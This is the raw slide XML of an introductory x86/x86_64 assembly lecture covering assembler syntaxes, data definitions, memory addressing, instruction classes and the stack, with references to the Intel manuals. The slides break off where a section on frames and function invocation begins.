            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15080707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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>X86/x86_64 Assembly Language</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Slightly) higher-level language than machine language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program is made of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directives: commands for the assembler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.data identifies a section with variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instructions: actual operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 08048f3fh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two possible syntaxes, with different ordering of the operands!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AT&amp;T syntax (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, GNU Assembler)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>mnemonic source, destination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOS/Intel syntax (Microsoft Assembler, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, IDA Pro)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>mnemonic destination, source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be set using: set disassembly-flavor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>intel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>att</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383869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a:t>Data Definition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1044483" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hexadecimal numbers end with h </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data objects are defined in a data segment using the syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>label     type    data1, data2, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Types can be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DB: Byte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DW: Word (16 bits)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DD: Double word (32 bits)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DQ: Quad word (64 bits)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>myvar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		DD  12345678h, 23456789h	# Two 32-bit values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  bar			DW  1234h 				# 16-bit data object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mystr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		DB ‘foo’, 0   				# Null-terminated string</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26898489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en-US"/>
              <a:t>Data Sizes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128922" y="988791"/>
            <a:ext cx="7044910" cy="3690191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107756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en-US"/>
              <a:t>Addressing Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1010691" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory access is composed of width, base, index, scale, and displacement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Base: starting address of reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Index: offset from base address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scale: constant multiplier of index</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Displacement: constant base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Width: size of reference (byte, word, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, qword)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Address = base + index*scale + displacement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>mov</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eax+ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>*4+20h], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack Bold"/>
              <a:cs typeface="Hack Bold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15918628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en-US" dirty="0"/>
              <a:t>Addressing Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1010691" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t> - 8]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copies the contents of the memory pointed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - 8 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copies the contents of the memory pointed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax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edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t> * 2], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack Bold"/>
              <a:cs typeface="Hack Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>moves the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into the memory at address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> * 2</a:t>
            </a:r>
          </a:p>
          <a:p>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804a0e4h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copies the value 804a0e4h into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx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[804a0e4h]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copies the content of memory at address 804a0e4h into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7951312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a:t>Instruction Classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xchg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, push, pop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Binary arithmetic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>add, sub, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>imul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>idiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, div, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and, or, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, not</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15907459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a:t>Instruction Classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, call, ret, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Values can be compared using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> # subtracts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> without saving the result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Various </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eflags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bits are set accordingly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (ZF=0), je (ZF=1), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (CF=0), …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control transfer can be direct (destination is a constant) or indirect (the destination address is the content of a register)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input/output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in, out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Misc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (0x90)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3429505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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intel 64 and IA-32 Architectures Software Developer’s Manual Volume 1: Basic Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intel 64 and IA-32 Architectures Software Developer’s  Manual Volume 2 (2A, 2B, 2C &amp; 2D): Instruction Set Reference, A-Z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>en.wikipedia.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/wiki/X86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4089428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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="987139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The stack usually grows towards lower memory addresses </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is the way the stack grows on many architectures including the Intel, Motorola, SPARC, and MIPS processors  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The stack pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) points to the top of the stack (the last valid address)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A push operation first decrements the stack pointer and then stores the value in the address contained in the register</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6631048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t>Frames and Function Invocation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="989187" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
